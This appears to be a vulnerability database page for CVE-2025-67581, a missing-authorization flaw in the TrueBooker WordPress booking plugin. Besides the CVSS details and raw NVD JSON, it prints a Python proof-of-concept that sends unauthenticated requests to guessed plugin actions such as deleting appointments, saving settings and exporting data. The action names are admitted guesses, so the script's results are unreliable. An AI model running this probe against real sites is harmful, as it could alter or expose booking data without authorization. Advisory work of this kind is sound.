Security Vulnerability Report
中文
CVE-2025-67581 CVSS 5.3 MEDIUM

CVE-2025-67581

Published: 2025-12-09 16:18:36
Last Modified: 2026-04-27 18:16:44

Description

Missing Authorization vulnerability in themetechmount TrueBooker truebooker-appointment-booking allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects TrueBooker: from n/a through <= 1.1.0.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

TrueBooker Appointment Booking <= 1.1.0 (所有版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-67581 PoC - TrueBooker Broken Access Control # Target: WordPress site with TrueBooker plugin <= 1.1.0 import requests import sys def check_vulnerability(target_url): """ Check if target is vulnerable to CVE-2025-67581 Missing Authorization in TrueBooker plugin """ # Identify potential unprotected TrueBooker AJAX endpoints ajax_endpoints = [ f"{target_url}/wp-admin/admin-ajax.php", f"{target_url}/wp-json/truebooker/v1/" ] # Common TrueBooker action names that might be unprotected actions = [ "truebooker_get_appointments", "truebooker_save_settings", "truebooker_delete_appointment", "truebooker_update_status", "truebooker_export_data" ] print(f"[*] Testing {target_url} for CVE-2025-67581") print(f"[*] Target plugin: TrueBooker Appointment Booking <= 1.1.0") print("="*60) for endpoint in ajax_endpoints: for action in actions: try: # Test unauthenticated access to protected functions data = { "action": action, "nonce": "", # Attempt without valid nonce } response = requests.post(endpoint, data=data, timeout=10) # Check if response indicates successful unauthorized access # (No 403 Forbidden or login redirect) if response.status_code == 200 and "log" not in response.text.lower(): print(f"[!] Potential vulnerability found!") print(f"[!] Endpoint: {endpoint}") print(f"[!] Action: {action}") print(f"[!] Response status: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[-] Error testing {action}: {e}") print("\n[*] Scan complete. Manual verification recommended.") print("[*] Reference: https://patchstack.com/database/Wordpress/Plugin/truebooker-appointment-booking") if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve-2025-67581.py <target_url>") print("Example: python cve-2025-67581.py http://example.com") sys.exit(1) target = sys.argv[1].rstrip('/') check_vulnerability(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-67581", "sourceIdentifier": "[email protected]", "published": "2025-12-09T16:18:35.850", "lastModified": "2026-04-27T18:16:44.450", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in themetechmount TrueBooker truebooker-appointment-booking allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects TrueBooker: from n/a through <= 1.1.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/truebooker-appointment-booking/vulnerability/wordpress-truebooker-plugin-1-1-0-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}